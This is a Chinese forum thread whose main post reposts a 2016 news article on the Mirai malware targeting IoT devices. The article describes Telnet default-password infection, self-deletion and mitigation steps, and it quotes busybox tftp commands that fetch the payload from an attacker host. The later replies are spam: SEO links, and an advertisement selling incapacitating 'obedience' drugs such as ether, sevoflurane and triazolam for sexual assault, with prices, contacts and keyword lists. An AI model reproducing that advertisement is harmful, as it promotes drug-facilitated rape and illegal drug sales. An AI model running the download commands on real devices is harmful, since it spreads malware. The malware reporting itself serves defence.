请选择 进入手机版 | 继续访问电脑版
    查看: 589|回复: 3

    Linux/Mirai ELF :专门攻击物联网设备的恶意软件

    [复制链接]

    6587

    主题

    6346

    帖子

    6359

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    6359
    基情
    8
    发表于 2016-9-7 19:32:11 | 显示全部楼层 |阅读模式


        E安全9月7日讯 MalwareMustDie的专家发现了一款名为“ELF Linux/Mirai”的新型ELF木马后门,正针对物联网设备展开攻击。

        MalwareMustDie专家八月分析了一个特殊的ELF木马后门样本—被称为ELF Linux/Mirai,目前该木马后门正针对物联网设备。这款恶意软件的名称与二进制“mirai.*”相同。据专家称,该恶意软件已发动数起攻击。

        VirusTotal在线扫描服务公司证实,ELF Linux/Mirai十分隐秘,许多杀毒解决方案仍无法检测到,检测率极低。

        MalwareMustDie博客中一份分析报告指出,“缺乏检测的原因在于缺乏样本,难以从受感染的物联网设备、路由器、DVR或WebIP摄像头和嵌入式平台中带有Busybox二进制的Linux中获取样本。”

        Security Affairs检测的最后一个EFL为Linux木马Linux.PNScan,这款木马活跃针对x86 Linux路由器,设法安装后门。

        但MalwareMustDie透露,Linux/Mirai比PnSan大得多。

        分析指出,“这种威胁于8月初浮出水面,尽管这个ELF不易被检测,因为在安装后不会马上显示软件活动:只是静静待在这里,不会在系统中残留恶意软件,除了恶意软件运行的延迟过程外,所有文件均被删除。”

        这就意味着当感染成功,难以通过未受感染的系统区分受感染的系统,除了内存分析。我们讨论的是一类不易分析并调试的设备。起初,对文件系统或外部网络流量的普通分析无法提供任何证据。

        物联网环境不利。物联网塑造着新一类强大的僵尸网络,扩散至全球。哪个国家更易遭受此类攻击?

        “具有Linux busybox嵌入式联网设备的国家,例如DVR或Web网络摄像头;以及通过在全球IP地址运行的Linux路由器为用户提供ISP服务的国家更易成为这类攻击的目标,尤其,未保护Telnet远程端口服务(Tcp/23)访问安全的设备或服务。”

        “Linux/Mirai开发人员成功编码字符串并将流量分流来伪装自己。”

        对于所有系统管理员最重要的是防御这类感染:与好朋友一起参与开放式过滤系统,安全工程师正努力推动—MalwareMustDie—正确的过滤签名提醒系统管理员是否遭受这类攻击威胁。在一个试点中,具有正确签名的系统管理员发现,仅仅几天内,攻击来源就有数百个地址。

        似乎感染在扩散,僵尸网络似乎非常广泛。

        这时,所有想要保护系统的系统管理员应当参看以下缓解措施:

        如果你具有物联网设备,请确保未打开telnet服务,该服务未运行。

        如果你未使用TCP/48101端口,请禁用,免于遭受感染和进一步损害。

        监控telnet连接,因为用户感染的僵尸网络协议为Telnet服务。

        逆向过程,寻找MalwareMustDie检测工具提示中报告的字符串。

        然而,我们确切地知道Linux/Mirai ELF恶意软件,但为什么恶意软件分析专家却不热衷分析这款恶意软件?

        MalwareMustDie表示,“很多人不知道此款恶意软件的原因在于杀毒专家认为它是Gafgyt或Bashlite或Bashdoor的变种。另外,此款软件的真实样本难以获取,因为许多恶意软件分析专家必须在受感染的设备内存上提取,或者入侵CNC获取。”

        这就意味着,如果我们关掉受感染的设备,取证分析难上加难:所有信息会丢失,并且可能需要新的感染程序重新启动。

        之前的ELF恶意软件版本之间的最大不同点是什么?

        MalwareMustDie指出,“相比过去的类似威胁,攻击者目前具有不同策略—尽量潜伏(延缓)、不被检测(AV或流量过滤器中的低检测率)、不可见(未追踪,也没有样本提取)、加密ELF的ASCII数据,保密分布。但很明显,攻击者的主要目的仍是DDoS僵尸网络,以通过他们所谓的Telnet扫描器快速将感染扩散至物联网设备。”

        这款ELF真正隐秘地方在于,唯一的追踪途径是从运行的设备中提取内存。

        感染模式 攻击者通过SSH或Telnet账号利用已知漏洞或使用默认密码入侵物联网设备。

        如果以现有设备的感染条件作为目标,这类ELF使用特定的技术分叉(fork)新的进程,否则节点即为安全,安装不会继续。

        一旦获取设备的外壳访问,攻击者将下载ELF Linux/Mirai恶意软件的有效荷载,下方为在物联网设备上执行操作的命令:

        ‘busybox tftp‘ -r [MalwareFile] -g [IPsource]

        ‘busybox tftp‘ -g -l ‘dvrHelper’ -r [MalwareFile] [IPsource]

        难以分析Linux/Mirai感染,原因在于一旦执行,恶意软件还能删除痕迹。

        MalwareMustDie团队表示,“Linux/Mirai感染的某些情况表明,该恶意软件在没有参数的情况下执行;某些情况下,执行后会删除下载的恶意软件文件。这种情况下,通常无法获取样本,除非将恶意软件过程转储至ELF二进制。这就是难以获取这种新型威胁样本的原因。”

        “一经执行,该恶意软件将自行删除,避免留下踪迹,但进程仍在运行。”在lsof中能看见的一些物联网设备或带有特定PID的/proc列表,也就是:

        /proc/{PID}/exe - ‘/dev/.{something}/dvrHelper’ (删除)

        /proc/{PID}/exe - ‘./{长字母字符串}’ alphabet (删除)

        进程运行的同时,恶意软件还打开PF_INET(TCP的UNIX网络套接字),并将它绑定到本地主机IP地址127.0.0.1的端口TCP/48101,之后开始侦听连入连接。这款恶意软件通过新进程PID分叉新进程。受感染的设备将在其它设备的Telnet服务上进行连接,进一步实施滥用行为。

        E安全注:本文系E安全编辑报道,转载请联系授权,并保留出处与链接,不得删减内容。联系方式:① 微信号zhu-geliang ②邮箱eapp@easyaq.com

        @E安全,最专业的前沿网络安全媒体和产业服务平台,每日提供优质全球网络安全资讯与深度思考,欢迎关注微信公众号「E安全」(EAQapp),或登E安全门户网站www.easyaq.com , 查看更多精彩内容。

                                                                            阅读原文

                                                       
    回复

    使用道具 举报

    0

    主题

    225

    帖子

    225

    积分

    中级会员

    Rank: 3Rank: 3

    积分
    225
    基情
    0
    发表于 2017-6-14 11:07:20 | 显示全部楼层
    回复 支持 反对

    使用道具 举报

    0

    主题

    225

    帖子

    225

    积分

    中级会员

    Rank: 3Rank: 3

    积分
    225
    基情
    0
    发表于 2017-6-16 03:24:37 | 显示全部楼层
    回不回呢,考虑再三,还是不回了吧。
    江西设计公司          http://www.xkkdl.com/
    江西室内软装          http://www.xkkdl.com/
    江西配饰设计          http://www.xkkdl.com/
    南昌装修公司          http://www.xkkdl.com/
    南昌写字楼装修          http://www.xkkdl.com/
    南昌办公室装修          http://www.xkkdl.com/
    南昌软装搭配          http://www.xkkdl.com/
    南昌厂房改造          http://www.xkkdl.com/
    南昌别墅装修          http://www.xkkdl.com/
    南昌装饰公司          http://www.xkkdl.com/
    南昌室内装潢          http://www.xkkdl.com/
    南昌KTV装修          http://www.xkkdl.com/
    南昌店铺装修          http://www.xkkdl.com/
    南昌旧房改造          http://www.xkkdl.com/
    南昌酒店装修          http://www.xkkdl.com/
    南昌设计公司          http://www.xkkdl.com/
    南昌室内软装          http://www.xkkdl.com/
    南昌配饰设计          http://www.xkkdl.com/
    南昌尚品装饰          http://www.xkkdl.com/
    江西中宅装饰          http://www.xkkdl.com/
    南昌装修公司排名          http://www.xkkdl.com/
    南昌别墅装修设计          http://www.xkkdl.com/
    南昌别墅装修公司          http://www.xkkdl.com/
    南昌别墅装修整体设计          http://www.xkkdl.com/
    南昌十大装修公司排名          http://www.xkkdl.com/
    南昌口碑最好的装饰公司          http://www.xkkdl.com/
    江西家装公司          http://www.xkkdl.com/
    江西装潢公司          http://www.xkkdl.com/
    最好的家装公司          http://www.xkkdl.com/
    南昌装饰公司哪家好          http://www.xkkdl.com/
    江西装饰公司哪家好          http://www.xkkdl.com/
    南昌装饰设计公司          http://www.xkkdl.com/
    回复 支持 反对

    使用道具 举报

    0

    主题

    13

    帖子

    13

    积分

    新手上路

    Rank: 1

    积分
    13
    基情
    0
    发表于 2017-7-14 01:21:49 | 显示全部楼层
    听o话o药 怎 么 购 买 听 话 药 怎 么 购 买▇买★加Q- Q 号█318513339█平安隐私维护█信誉第一诚信协作。专业的质量,强劲的效果,回头客信任。【十二年信誉老店】听o话o药价格★☆★【0Q:690603309云南苗族灵o药,微o信:lingyaoshijia】【只卖真实有效的药,我们的药百分百见效,当面买或者外地发法过来,要求发货的,付一百元订金发货,货到付余款,防止恶心订货】
    李宗瑞谜o奸o水QQ318513339乙o醚七o氟听o话o水约o会谜o魂o谜o香谜o烟麻o醉打不开网页请点“百o度快o照 一击即中,立马奏效
    镇江槽罐车大火两村为争山不通婚papi酱晒毕业照格格府叫价1.4亿腾讯总监被判9年6岁裸娃街头游荡百度糯米武汉救急王子文性感低胸装考595分无学可上雪姨王琳新恋情紫金山发现眼镜蛇工地挖出无名女尸高考658被打出走白云山现脆蛇蜥女子飞机上要离婚刘亦菲甜笑引尖叫1紫金山发现眼镜蛇2王子文性感低胸装3偷十几万送派出所4新郎婚礼奔赴抗洪5记室友密码偷取钱6papi酱晒毕业照7格格府叫价1.4亿8腾讯总监被判9年96岁裸娃街头游荡10考595分无学可上
    乙o醚,七o氟o烷,三o唑o仑,恩o氟o烷,氯o仿,麻o沸o散, o博o粉,【谜o昏o药o喷o雾型800元】【谜o昏o药o香o烟o型900元】【谜o昏o药o服o用o型500元】【谜o昏o药o拍o肩o型900元】【谜o昏o药o盘o香o型900元】【谜o幻o药o听o话o水900元】【听o话o喷o雾1100元】【听o话o拍o肩o粉1100元】【听o话o香o烟1100元】【听o话o盘o香1100元】【乙o醚800元】【七o氟o烷1200元】【恩o氟o烷1000元】【氯o仿350元】【谜o奸o水KKK3, 1200元】
    谜o奸,轮o奸,诱o奸,群o交,车o震,床o战,秘o书,漂亮,美女,激o情,强迫,性o交,援o交,情o色,气质美女,纯情,少妇,装,淫o乱,做o爱,谜o倒,性o爱,
    **,嫂子,小姨,强o暴,校花,抢o钱,绑o架,勒o索,敲o诈,美乳,大胸,巨乳,口o交,口o爆,舔o逼,吃o鸡o巴,舌o吻,吹o簫,内o射,自o慰,打o劫,抢o劫,
    上o床,开o房,嫖o娼,打o炮,打飞o机,叫o小o姐,微信,泡妞,陌陌,桑o拿,射o精,乱o伦,女同o学,女学生,女老师,女朋友,约会,炮o友,熟女,人妻,从后o面插o入,
    女大学生,约o炮,性o虐,约o炮神器,性感,姐姐o,妹妹,内衣,sm,奶罩,文胸,乳o房,乳o头,摸o奶,捉o奶,强o插,
    吞o精,射o脸,美少女,交o配,奸o淫,通o奸,勾o搭,发o生关o系,苟合,打o洞,爱o爱,fuck,性高o潮,气质美女,大o鸡o巴,大咪咪,日B,草o美女,o学生妹,插o少妇,上嫩模,
    怎么上o了o她,女生,床o戏,性o爱,淫o魔,性o侵,艳o照,香o艳,激o吻,艳福,大尺度,艳遇,绝色美女,淫o荡,卖o淫,吸奶,一丝不挂,露o点,破o处,处女,处男,
    偷情,偶遇,情愫,失o身,吊o嗨,赤裸,脱光,骚o货,私o处,引o诱,裸o照,情o妇,情o人,甜心,,酮体,内裤,丁字裤,处女膜,美艳,浓妆,失恋,拥抱,亲奶,亲咪咪,
    同床,抽o插,嫩白,苗条,吊带,洗澡,酥胸,BRA,**,恋情,恋爱,含o鸡o巴,肉o棒,含jj,吃精o液,颜o射,清纯少女,吹o喇o叭,吸吮,亲o吻,肉o体,风情万种,妩媚,
    奸o污,谜人,湿透,淫o荡,成熟,勃起,香肩,诱人身体,谜人身段,爱抚,阴o户,阴o道骚痒,柔情,,情慾亢奋,受不了,三角裤,**,爱o液,**,小o穴,粉o穴,
    丰满,淫o声,双乳,好紧,肛o交,樱桃小嘴,娇艳欲滴,尤物,楚楚动人,千娇百媚,天生丽质,妖艳,玉手,轻抚,屁o眼,享受,邂逅,打情骂俏,一o夜o情,包o养,

    山东青岛济南烟台潍坊临沂淄博济宁泰安聊城威海枣庄德州日照东营菏泽滨州莱芜章丘垦利诸城江苏苏州南京无锡常州徐州南通扬州盐城淮安连云港泰州宿迁镇江沭阳大丰浙江杭州宁Bo温州金华嘉兴台州绍兴湖州丽水衢州舟山乐清瑞安义乌安徽合肥芜湖蚌埠阜阳淮南安庆宿州六安淮北滁州马鞍山铜陵宣城亳州黄山池州巢湖和县霍邱桐城华南广东深圳广州东莞佛山中山珠海惠州江门汕头湛江肇庆茂名揭阳梅州清远阳江韶关河源云浮汕尾潮州台山阳春顺德福建福州厦门泉州莆田漳州宁德三明南平龙岩武夷山广西南宁柳州桂林玉林梧州北海贵港钦州百色河池来宾贺州防城港崇左海南海口三亚五指山三沙中南河南郑州洛阳新乡南阳许昌平顶山安阳焦作商丘开封濮阳周口信阳驻马店漯河三门峡鹤壁济源明港鄢陵禹州长葛湖北武汉宜昌襄阳荆州十堰黄石孝感黄冈恩施荆门咸宁鄂州随州潜江天门仙桃神农架湖南长沙株洲益阳常德衡阳湘潭岳阳郴州邵阳怀化永州娄底湘西张家界江西南昌赣州九江宜春吉安上饶萍乡抚州景德镇新余鹰潭永新东北辽宁沈阳大连鞍山锦州抚顺营口盘锦朝阳丹东辽阳本溪葫芦岛铁岭阜新庄河瓦房店黑龙江哈尔滨大庆齐齐哈尔牡丹江绥化佳木斯鸡西双鸭山鹤岗黑河伊春七台河大兴安岭吉林长春吉林四平延边松原白城通化白山辽源西南四川成都绵阳德阳南充宜宾自贡乐山泸州达州内江遂宁攀枝花眉山广安资阳凉山广元雅安巴中阿坝甘孜云南昆明曲靖大理红河玉溪丽江文山楚雄西双版纳昭通德宏普洱保山临沧迪庆怒江贵州贵阳遵义黔东南黔南六盘水毕节铜仁安顺黔西南西藏拉萨日喀则山南林芝昌都那曲阿里华北河北石家庄保定唐山廊坊邯郸秦皇岛沧州邢台衡水张家口承德定州馆陶张北赵县正定山西太原临汾大同运城晋中长治晋城阳泉吕梁忻州朔州临猗清徐  呼和浩特包头赤峰鄂尔多斯通辽呼伦贝尔巴彦淖尔市乌兰察布锡林郭勒盟兴安盟乌海阿拉善盟海拉尔 西北 陕西 西安咸阳宝鸡渭南汉中榆林延安安康商洛铜川 新疆 乌鲁木齐昌吉巴音郭楞伊犁阿克苏喀什哈密克拉玛依博尔塔拉吐鲁番和田石河子克孜勒苏阿拉尔五家渠图木舒克库尔勒 甘肃 兰州天水白银庆阳平凉酒泉张掖武威定西金昌陇南临夏嘉峪关甘南 宁夏 银川吴忠石嘴山中卫固原 青海 西宁海西海北果洛海东黄南玉树海南
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|小黑屋|网站地图|DZ商业模板|VR福利资源|嵌入式Linux论坛 ( 粤ICP备15085165号-2

    GMT+8, 2017-8-23 18:06 , Processed in 0.234001 second(s), 10 queries , File On.

    Powered by 深嵌论坛 X3.3

    © 2001-2013 Comsenz Inc.

    快速回复 返回顶部 返回列表